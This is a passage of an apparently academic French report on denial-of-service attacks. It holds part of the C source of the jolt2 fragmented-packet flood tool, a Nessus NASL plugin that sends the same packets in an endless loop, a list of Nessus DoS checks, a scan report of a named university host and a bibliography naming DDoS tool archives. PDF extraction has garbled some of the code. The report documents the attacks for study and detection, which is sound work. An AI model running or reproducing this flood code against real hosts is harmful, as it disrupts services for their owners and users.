31 } u_long host_to_ip(char *host_name) { static u_long ip_bytes; struct hostent *res; res = gethostbyname(host_name); if (res == NULL) return (0); memcpy(&ip_bytes, res->h_addr, res->h_length); return (ip_bytes); } void quit(char *reason) { perror(reason); close(spf_sck); exit(-1); } int do_frags (int sck, u_long src_addr, u_long dst_addr, int port) { int bs, psize; unsigned long x; struct sockaddr_in to; to.sin_family = AF_INET; to.sin_port = 1235; to.sin_addr.s_addr = dst_addr; if (port) psize = iplen + udplen + 1; else psize = iplen + icmplen + 1; memset(&pkt, 0, psize); pkt.ip.version = 4; pkt.ip.ihl = 5; pkt.ip.tot_len = htons(iplen + icmplen) + 40; pkt.ip.id = htons(0x455); pkt.ip.ttl = 255; pkt.ip.protocol = (port? IPPROTO_UDP : IPPROTO_ICMP); pkt.ip.saddr = src_addr; pkt.ip.daddr = dst_addr; pkt.ip.frag_off = htons (8190); if (port) { pkt.proto.udp.source = htons(port 1235); pkt.proto.udp.dest = htons(port); pkt.proto.udp.len = htons(9); pkt.data = 'a'; } else { pkt.proto.icmp.type = ICMP_ECHO; pkt.proto.icmp.code = 0; pkt.proto.icmp.checksum = 0; } Page 30

32 while (1) { bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to, sizeof(struct sockaddr)); } return bs; } int main(int argc, char *argv[]) { u_long src_addr, dst_addr; int i, bs=1, port=0; char hostname[32]; if (argc < 2) usage (argv[0]); gethostname (hostname, 32); src_addr = host_to_ip(hostname); while ((i = getopt (argc, argv, "s:p:h"))!= EOF) { switch (i) { case 's': dst_addr = host_to_ip(optarg); if (!dst_addr) quit("bad source address given."); break; case 'p': port = atoi(optarg); if ((port <=0) (port > 65535)) quit ("Invalid port number given."); break; case 'h': default: usage (argv[0]); } } dst_addr = host_to_ip(argv[argc-1]); if (!dst_addr) quit("bad destination address given."); spf_sck = socket(af_inet, SOCK_RAW, IPPROTO_RAW); if (!spf_sck) quit("socket()"); if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs, sizeof(bs)) < 0) quit("ip_hdrincl"); do_frags (spf_sck, src_addr, dst_addr, port); } Page 31

33 7.3. Plugins Ils sont nombreux les essais qu on a fait pour la détection de l attaque jolt2.c. Voici un exemple: # # Détection de l attaque jolt2.c # if(description) { script_id(00022); name["english"] = "jolt2dos"; name["francais"] = " jolt2dos "; script_name(english:name["english"], francais:name["francais"]); desc["english"] = " This plugin detect if the target can be reach by the program jolt2.c"; desc["francais"] = " Ce plugin détecte si la cible peut être affectée par le programme jolt2.c "; script_description(english:desc["english"], francais:desc["francais"]); script_category(act_denial); family["english"] = "denial of service"; family["francais"] = "déni de service"; script_family(english:family["english"], francais:family["francais"]); exit(0); } # # The script code starts here # target = get_host_ip(); src = this_host(); ############## PAQUET IP ################ ip = forge_ip_packet(ip_hl:5, ip_v:4, ip_tos:0, ip_len:28, ip_id:0x455, ip_off:8190, ip_ttl:255, ip_p:ipproto_icmp, ip_src:src, ip_dst:target); ############## PAQUET ICMP ################## icmp = forge_icmp_packet(ip:ip, Page 32

34 icmp_type:8, icmp_code:0, icmp_cksum:0, icmp_seq:0, icmp_id:0); ############## ENVOI DU PAQUET et ATTENTE DE REPONSE ################ while(1){ reply = send_packet(icmp,pcap_active:true); if(!reply){ security_hole(port); set_kb_item(name:"host/dead", value:true); } } N.B.: Normalement, les détections d attaque se font de cette façon, mais dans ce cas c est incorrect parce que : la cible a le temps de se remettre. Cette détection n est pas très bonne parce que peut-être il y e d ordinateurs qui ne sont pas configurés pour répondre à ces types de paquets nous attendons à recevoir la réponse. Avec l utilisation de librairies pcap on économiserait ce temps d attente. Page 33

35 7.4. Attaques de déni de service détectés par Nessus. syn flood" attack _bombing_spamming anonymous_ftp_config ping ICMP Storm aka Smurf attack Statistical Attack Teardrop UDP null size going to SNMP DoS smad Oracle Web Server denial of Service pimp Nortel Contivity DoS OShare Nestea Linux : 0 length fragment bug Wingate denial of service Winnuke NT IIS Malformed HTTP Request Header DoS Vulnerability IIS Malformed Extension Data in URL Land IIS "GET../../" Firewall/1 UDP port 0 DoS Bonk ICQ Denial of Service attack Axent Raptor"s DoS GroupWise buffer overflow SalesLogix Eviewer WebApp crash ATH0 modem hangup Eicon Diehl LAN ISDN modem DoS Ascend Kill Domino HTTP Denial cisco http DoS SunKill Annex DoS AnalogX denial of service SLMail denial of service rfpoison Livingston Portmaster crash Notes MTA denial MDaemon DoS Wingate POP3 USER overflow rfparalyze IIS FTP server crash Hyperbomb MDaemon crash Cassandra NNTP Server DoS FTP ServU CWD overflow Interscan 3.32 SMTP Denial BFTelnet DoS Chameleon SMTPd overflow Microsoft"s SQL TCP/IP denial of service Novell Border Manager WindowsNT DNS flood denial Ken! DoS RealServer denial of Service RealServer Ramgen crash (ramcrash) Page 34

36 SLMail:27 denial of service WINS UDP flood denial Netscape Enterprise Server DoS Mercure WebView WebClient WindowsNT PPTP flood denial Microsoft Media Server DoS MDaemon Worldclient crash MDaemon Webconfig crash Yahoo Messenger Denial of Service attack pnserver crash iparty Cisco DoS HotSync Manager Denial of Service attack Page 35

37 7.5. Nessus Scan Report. Number of hosts which were alive during the test : 1 Number of security holes found : 2 Number of security warnings found : 13 List of the tested hosts : (Security problems found) : List of open ports : general/udp general/tcp netbios-ns (137/udp) unknown (780/udp) (Security hole found) smtp (25/tcp) (Security hole found) www (80/tcp) telnet (23/tcp) ftp (21/tcp) ntalk (518/udp) general/icmp ssh (22/tcp) Information found on port general/udp For your information, here is the traceroute to : Information found on port general/tcp Predictable TCP sequence number : If numbers are close together, or rise by the same number all the time, it means that it is easy to predict the next sequence number that will be used by the computer (since these aren't randomized enough). This may help attackers with several other attacks, such as Session Hijacking or with Session Spoofing, where in those cases the attacker needs to predict certain charactistics of the attacked computer. The TCP sequence numbers retrieved and their relative size were: SEQ: SEQ: relative size: 4315 SEQ: relative size: SEQ: relative size: 8705 SEQ: relative size: 4990 SEQ: relative size: 3962 SEQ: relative size: 4145 SEQ: relative size: 4083 SEQ: relative size: 4130 SEQ: relative size: 4428 Page 36

38 CVE : CVE Information found on port general/tcp If numbers are close together, or rise by the same number all the time, it means that the amount of traffic can be predicted by monitoring changes in the idetification numbers (since these aren't randomized enough). This may help attackers with several other attacks, such as Session Hijacking or with Session Spoofing, where in those cases the attacker needs to predict certain charactistics of the attacked computer (such as traffic size). The IP Identification numbers retrieved and their relative size were: ID: 9902 ID: 9903 relative size: 1 ID: 9904 relative size: 1 ID: 9905 relative size: 1 ID: 9906 relative size: 1 ID: 9907 relative size: 1 ID: 9908 relative size: 1 ID: 9909 relative size: 1 ID: 9910 relative size: 1 ID: 9911 relative size: 1 Information found on port netbios-ns (137/udp). The following 5 NetBIOS names have been gathered : LOIF = This is the computer name registered for workstation services by a WINS client. LOIF = Computer name that is registered for the messenger service on a computer that is a WINS client. LOIF GERBOWORLD = Workgroup / Domain name GERBOWORLD. This SMB server seems to be a SAMBA server (this is not a security risk, this is for your information). This can be told because this server claims to have a null MAC address If you do not want to allow everyone to find the NetBios name of your computer, you should filter incoming traffic to this port. Risk factor : Medium Vulnerability found on port unknown (780/udp) The statd RPC service is running. This service has a long history of security holes, so you should really know what you are doing if you decide to let it run. Page 37

39 * NO SECURITY HOLE REGARDING THIS PROGRAM HAVE BEEN TESTED, SO THIS MIGHT BE A FALSE POSITIVE * We suggest you to disable this service. Risk factor : High CVE : CVE Vulnerability found on port smtp (25/tcp) It was possible to crash the remote SMTP server by opening a great amount of sockets on it. This problem allows crackers to make your SMTP server crash, thus preventing you from sending or receiving s, which will affect your work. Solution : contact your vendor for a fix. Risk factor : Serious CVE : CAN Information found on port smtp (25/tcp) loif.maisel.enst-bretagne.fr ESMTP Exim 3.12 #1 Thu, 08 Jun :47: Commands supported:214- HELO EHLO MAIL RCPT DATA AUTH 214 NOOP QUIT RSET HELP Information found on port www (80/tcp) The remote web server type is : Apache/ (Unix) Debian/GNU We recommend that you configure your web server to return bogus versions, so that it makes the cracker job more difficult Information found on port telnet (23/tcp) loif.maisel.enst-bretagne.fr login: Information found on port telnet (23/tcp) The Telnet service is running. This service is dangerous in the sense that it is not ciphered - that is, everyone can sniff Page 38

40 the data that passes between the telnet client and the telnet server. This includes logins and passwords. You should disable this service and use OpenSSH instead. ( Solution : Comment out the 'telnet' line in /etc/inetd.conf. Risk factor : Low CVE : CAN Information found on port ftp (21/tcp) ProFTPD 1.2.0pre10 Server (ProFTPD) [loif.maisel.enst-bretagne.fr] Information found on port ntalk (518/udp) talkd is running (talkd is the server that notifies a user that someone else wants to initiate a conversation) Malicious hackers may use it to abuse legitimate users by conversing with them with a false identity (social engineering). In addition to this, crackers may use this service to execute arbitrary code on your system. Solution: Disable talkd access from the network by adding the approriate rule on your firewall. If you do not need talkd, comment out the relevant line in /etc/inetd.conf. See aditional information regarding the dangers of keeping this port open: Risk factor : Medium CVE : CVE Information found on port ntalk (518/udp) talkd protocol version: 1 CVE : CVE Information found on port general/icmp The remote host answers to an ICMP timestamp request. This allows an attacker to know the date which is set on your machine. This may help him to defeat all your time based authentifications protocols. Page 39

41 Solution : filter out the icmp timestamp requests (13), and the outgoing icmp timestamp replies (14). Risk factor : Low CVE : CAN Information found on port ssh (22/tcp) SSH Page 40

42 7.6. Acronymes. CERT/CC CERT DSIT IRT ISP NCCS NSP IMAP IDS chargen RFC IETF rcp RPC NIPC STAU PSIRT ISS SATAN ISS GIMP GNU GTK FSF GPL SEI DARPA TFN ZZ FBI IRT CSIRT NASL CERT Coordination Center Computer Emergency Response Team Distributed - Systems Intruder Tools Incident Reponse Teams Internet Service Provider National Computer Crime Squad Network Security Probe Internet Message Access Protocol Intrusion Detection Systems character generator Request For Comment The Internet Engineering Task Force Remote copy command Remote procedure call National Infrastructure Proctection Center Special Technology Applications Unit Product Security Incident Response Team Internet Scanner Security Administrator Tool for Analyzing Networks Internet Security Scanner GNU Image Manipulation Program GNU's Not Unix GIMP Toolkit Free Software Foundation GNU General Public License Software Engineering Institute Defense Advanced Research Projects Agency tribe flood network (=teletubbie flood net) Zombie Zapper Federal Bureau of Investigation Incident Reponse Team Computer Security Incident Reponse Team Nessus Attack Scripting Language Page 41

43 8. Bibliographie. Results of the Distributed Systems Intruder Tools Workshop Description: DDoS URL: Denial of service Description: DoS URL: Whitehats Sitemap Description: sécurité, outils, librairies, forum, services, DDoS URL: denial-of-service-tools Description: DoS Identifying tools that aid in detecting signs of intrusion Description : outils de défense CERT Summaries Description : Rapports d attaques Technotronic Description : Information sécurité, outils Distributed Denial of Service Attacks Description : article Trinoo Description : analysis TFN Description : analysis ttp://staff.washington.edu/dittrich/misc/tfn.analysis, Stacheldraht Description : analysis ttp://staff.washington.edu/dittrich/misc/tfn.analysis, Page 42

44 Code source des attaques distribuées tfn2k.tgz tfn.tgz trinoo.tgz Exploit des attaques de déni de service Security focus Description: IDS, services et rapports CVE Journales Description : Magazines Info Security Asia Description : conferences HNC Network Description : IT & security news, archives hacking utilities mstream Description : DDoS service.exe Description : DDoS Page 43